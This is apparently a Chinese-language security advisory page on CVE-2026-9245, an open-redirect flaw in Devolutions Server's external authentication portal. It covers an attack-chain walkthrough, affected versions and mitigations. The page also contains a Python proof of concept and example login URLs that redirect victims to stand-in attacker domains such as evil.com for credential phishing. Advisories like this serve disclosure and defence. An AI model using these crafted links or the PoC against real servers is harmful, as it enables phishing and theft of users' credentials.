IPBUF安全漏洞报告
English
CVE-2026-9245 CVSS 5.0 中危

CVE-2026-9245 Devolutions Server开放重定向漏洞

披露日期: 2026-05-22

漏洞信息

漏洞编号
CVE-2026-9245
漏洞类型
开放重定向
CVSS评分
5.0 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Devolutions Server

相关标签

开放重定向输入验证Devolutions Server钓鱼攻击认证绕过CVE-2026-9245外部门户认证URL重定向

漏洞概述

CVE-2026-9245是Devolutions Server外部门户认证流程中的一个输入验证安全漏洞。该漏洞由于对用户提供的重定向URL缺乏充分的验证和过滤,攻击者可以构造恶意的登录链接,将受害者重定向到任意外部域名。攻击者通常利用钓鱼邮件或社交工程手段,诱骗用户点击特制的链接。由于重定向发生在合法的登录流程中,受害者很难察觉异常,容易泄露敏感凭据或遭受进一步攻击。此漏洞无需认证即可利用,但需要用户交互才能完成攻击。CVSS 3.1评分5.0,属于中等严重程度。

技术细节

该漏洞位于Devolutions Server的外部门户认证提供者流程中。攻击者通过在登录链接的回调URL参数中注入恶意域名,实现钓鱼重定向。具体来说,系统在处理认证回调时,未对redirect_uri或类似参数进行严格的域名白名单校验。攻击者可以构造类似https://target-server.com/auth/external?redirect=https://attacker-controlled-domain.com/fake-login的URL,当受害者点击后,会先经过正常的认证流程,然后被重定向到攻击者控制的域名。由于浏览器地址栏仍显示原始的合法域名,受害者很难察觉已被钓鱼。此攻击可用于窃取凭据、会话cookie或进行进一步的社会工程攻击。攻击复杂度较高(AC:H),因为需要精确构造URL并诱导用户点击。

攻击链分析

STEP 1
步骤1: 侦察和信息收集
攻击者识别目标组织使用的Devolutions Server版本,确认是否在受影响版本范围内(2026.1.6.0-2026.1.16.0或2025.3.20.0及更早版本)
STEP 2
步骤2: 构造恶意链接
攻击者构造包含恶意重定向参数的登录URL,例如在redirect_uri参数中注入攻击者控制的域名,如https://target-server/auth/external?redirect=https://evil.com/fake-login
STEP 3
步骤3: 社会工程攻击
攻击者通过钓鱼邮件、即时消息或其他渠道向目标用户发送包含恶意链接的消息,伪装成正常的密码重置或登录通知
STEP 4
步骤4: 诱导用户点击
受害者点击恶意链接后,浏览器访问合法的Devolutions Server登录页面,地址栏显示可信域名,降低用户警惕
STEP 5
步骤5: 执行重定向
受害者完成认证流程(或部分流程)后,服务器将用户重定向到攻击者控制的域名,整个过程对用户不可见
STEP 6
步骤6: 凭证窃取
受害者被引导到攻击者精心设计的钓鱼页面,输入凭据或执行其他敏感操作,攻击者从而窃取用户凭证或会话信息

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2026-9245 PoC - Open Redirect in Devolutions Server # Description: Attacker crafts malicious login link to redirect victim to attacker-controlled domain import requests import urllib.parse from datetime import datetime def generate_malicious_link(target_server, attacker_domain): """ Generate malicious login link with open redirect payload """ # Normal Devolutions Server login endpoint base_url = f"https://{target_server}" # Malicious redirect parameter pointing to attacker's domain redirect_param = urllib.parse.quote(f"https://{attacker_domain}/phishing-page") # Construct the malicious URL malicious_url = f"{base_url}/auth/external?provider=saml&redirect_uri={redirect_param}" return malicious_url def check_vulnerability(target_server, attacker_domain): """ Check if the target is vulnerable to open redirect """ malicious_url = generate_malicious_link(target_server, attacker_domain) print(f"[*] Target: {target_server}") print(f"[*] Attacker Domain: {attacker_domain}") print(f"[*] Malicious URL: {malicious_url}") try: response = requests.get(malicious_url, allow_redirects=False, timeout=10) # Check for redirect to attacker domain if 'location' in response.headers: location = response.headers['location'] print(f"[+] Response Location Header: {location}") if attacker_domain in location: print("[!] VULNERABLE: Server redirects to attacker-controlled domain") return True # Also check actual redirects final_url = response.url if attacker_domain in final_url: print("[!] VULNERABLE: Final URL redirected to attacker domain") return True print("[-] Not vulnerable or no redirect detected") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": # Configuration TARGET_SERVER = "victim-server.devolutions.local" ATTACKER_DOMAIN = "evil-attacker.com" print("=" * 60) print("CVE-2026-9245 PoC - Devolutions Server Open Redirect") print(f"Timestamp: {datetime.now().isoformat()}") print("=" * 60) vulnerable = check_vulnerability(TARGET_SERVER, ATTACKER_DOMAIN) if vulnerable: print("\n[!] Attack Scenario:") print("1. Attacker sends phishing email with malicious link") print("2. Victim clicks link, sees legitimate Devolutions Server URL") print("3. After 'login', victim redirects to attacker's phishing page") print("4. Victim enters credentials on fake page") print("5. Attacker steals credentials")

影响范围

Devolutions Server 2026.1.6.0 - 2026.1.16.0
Devolutions Server 2025.3.20.0 及更早版本

防御指南

临时缓解措施
如无法立即升级,可采取以下临时缓解措施:1) 监控认证日志,查找异常的重定向模式;2) 在网络边界部署WAF规则,检测并阻止包含外部域名的认证回调参数;3) 对外部认证链接实施URL预览功能;4) 加强员工安全意识培训,警惕通过邮件或消息收到的登录链接;5) 启用MFA多因素认证以减轻凭证泄露风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表